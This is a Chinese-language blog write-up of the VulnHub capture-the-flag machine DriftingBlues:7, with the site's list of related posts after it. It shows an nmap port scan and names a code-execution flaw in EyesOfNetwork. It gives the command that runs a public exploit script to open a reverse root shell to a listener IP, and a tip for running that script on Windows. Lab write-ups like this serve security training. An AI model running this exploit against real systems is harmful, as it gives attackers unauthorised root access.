Vulnhub-driftingblues:7

最新推荐文章于 2024-07-25 14:10:56 发布
最新推荐文章于 2024-07-25 14:10:56 发布
阅读量534 收藏
点赞数
分类专栏: web安全 文章标签: linux 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lionwerson/article/details/122290344
版权

nmap扫描端口:

nmap.exe 192.168.0.11 -p-

https://s4.ax1x.com/2022/01/03/THotnf.png

开放的端口有很多,浏览器先打开80端口测试:

https://s4.ax1x.com/2022/01/03/THoyj0.png

首先想到先测试一下用户名密码爆破,但是上网搜了一下,这个是一个网络监控框架,并且就有现成的Exploit可以使用,或者直接在msf中搜索就可以。

https://s4.ax1x.com/2022/01/03/THLSn1.png

eyesofnetwork 5.1到5.3存在一个代码执行漏洞,而且可以直接获取root权限:


#python3 eonrce.py ip:目标url  -ip:监听的ip  -port:监听的端口
python3 eonrce.py https://192.168.0.11/ -ip 192.168.0.16 -port 1233

https://s4.ax1x.com/2022/01/03/THoD9s.png

flag.txt:

https://s4.ax1x.com/2022/01/03/THor3n.png

💡 乱码了

这个Exploit是专门为linux写的,虽然是python写的,但是要用到nc,所以windows直接运行会报错。

https://s4.ax1x.com/2022/01/03/THo81I.png
💡 只要修改一下nc_command参数为nc.exe就可以运行了。

driftingblues下载:

http://www.vulnhub.com/entry/driftingblues-7,680/

Exploit:

https://github.com/h4knet/eonrce

lionwerson
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机 | DriftingBlues:7 write-up
xj28555的博客
05-04 8239
靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 题目的目标是要夺到里面的flag,搭建好环境如图。 首先用nmap扫描一下ip地址 nmap-sP192.168.110.1/24#扫描网段中存活主机 nmap-p-192.168.110.167 #在看看上面运行的服务 nmap-sV192.168.110.167#查看服务版本 上面运行的一些apache、...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub:DRIFTINGBLUES: 7
NeverForgetCX的博客
02-28 3190
前言: 在朋友的推荐下,空余时间中下载了vulnhub的随机靶机DRIFTINGBLUES:7,尝试实战 靶机在Vulnhub官网下载镜像,完成后可直接用VM打开虚拟机;努力成为专业白帽子!!! 信息收集: 攻击机kali:192.168.2.87 靶机ip:192.168.2.90 打开靶机竟然直接看见了ip信息 IP:192.168.2.90 直接登入kali使用nmap端口扫描 nmap -sV 192.168...
Vulnhub-DriftingBlues:7
从不专注的人的博客
06-08 176
Vulnhub-DriftingBlues:7 目录Vulnhub-DriftingBlues:7信息收集扫描目标网段查看端口及服务查看服务运行的版本访问网站提升权限运行脚本 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 信息收集 扫描目标网段 nmap -sP 172.16.58.0/24 查看端口及服务 nmap -p- 172.16.58.135 查看服务运行的版本 nmap -sV 172.16.58.135 访问
vulnhubdriftingblues7_vh
鲨鱼辣椒的博客
06-09 443
目录 信息搜集 扫描网段 扫描IP地址 扫描网站目录 查看网站 发现漏洞 GETSHELL 总结 信息搜集 扫描网段 发现网站真实IP 扫描IP地址 发现开启的端口以及服务,以及中间件的一些版本信息(这可能会是我们后续渗透的突破点) 扫描网站目录 dirsearch -u https://192.168.179.137/ 虽然我并没有扫出什么有用的东西,但是这个扫的动作很重要,有时候就是一些不起眼的地方会给我们意想不到的惊喜(一定要注重细节,对于我们渗透.
vulnhub实战——DRIFTINGBLUES: 7
Ar_Gin Work
04-18 657
vulnhub实战——Driftingblues7 前言 无聊发现vulnhub上一个新靶机,下载来玩玩看,挺简单的。搜了搜没教程就写个教程给大家参考一下吧~ 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 可以直接用VM打开,ip会自动获取并显示出来(挺人性化的) 正文 通过nmap扫描靶机nmap -sV -O 192.168.171.134 发现有80端口,我们访问一下发现为一个登录页面,后台名称为EyesOfNetwork 再目录
[Vulnhub靶机] DriftingBlues: 5
haosha。的博客
02-13 1952
[Vulnhub靶机] DriftingBlues: 5靶机渗透思路及方法(个人分享)
VulnHub-Walkthroughs:Alienum的md格式的VulnHub演练
03-07
7. **清理和复原**:最后,记得在完成演练后恢复原始状态,删除所有植入的后门,以保持虚拟机的干净,方便下一次使用。 **三、关键知识点** - **Nmap**:网络扫描工具,用于发现主机和开放端口。 - **Web 应用程序...
vuInhub靶场实战系列-prime:2
06-08
vuInhub靶场实战系列-prime:2
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups 该备忘单针对CTF玩家和初学者,可帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章。 我们已经根据我们的经验执行并编制了此列表。 请与您的联系分享此信息,并...
Linux:基础命令学习
qq_55038440的博客
07-20 1244
实例:-F根据文件类型在列出的文件名称后加一符号。实例: -R 递归显示目录中的所有文件和子目录。. 开头的隐藏文件也会列出。可执行文件则加 "*",用于显示目录文件信息。
Linux】条件变量及生产者消费者模型
2301_78636079的博客
07-23 959
条件变量与生产消费者模型
Linux:进程信号(一.认识信号、信号的产生及深层理解、Term与Core)
qq_74415153的博客
07-23 1400
1.认识信号 进程看待信号方式 2.信号的产生 2.1信号的处理的方式 --- signal()函数 2.2kil指令产生信号 2.3键盘产生信号 2.4系统调用发送信号 -kil系统调 用、raise()和abort()库函数 2.5软件条件产生信号 2.6异常产生信号 3.信号产生的深层理解 键盘产生信号 异常产生信号 4.Term与Core core文件
Linux】-----权限详解
m0_73470633的博客
07-21 724
Linux权限详解,看这一篇就够了!!!!!!
Linux】如何使用docker快速部署Stirling-PDF并实现远程处理本地文档
2301_77053417的博客
07-22 1544
本篇文章我们将在Linux上使用Docker在本地部署一个开源的PDF工具——Stirling PDF,并且结合cpolar的内网穿透实现公网随时随地访问。Stirling PDF一个强大的本地托管的基于Web的PDF操作工具,使用Docker,允许您对PDF文件执行各种操作,如分割、合并、转换、重组、添加图片、旋转、压缩等。这个本地托管的Web应用程序最初是一个100%由ChatGPT制作的应用程序,现在已经发展到包含了一系列的功能,以满足您所有的PDF需求。
【嵌入式开发 Linux 常用命令系列 7.7 -- find 和 sed 配合使用介绍】
CodingCos的博客
07-24 436
命令将文件中所有"demo" 字符串替换为 “hello”
linux 查看当前目录下占用空间命令
最新发布
Damien_J_Scott的博客
07-25 134
du -sh */
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值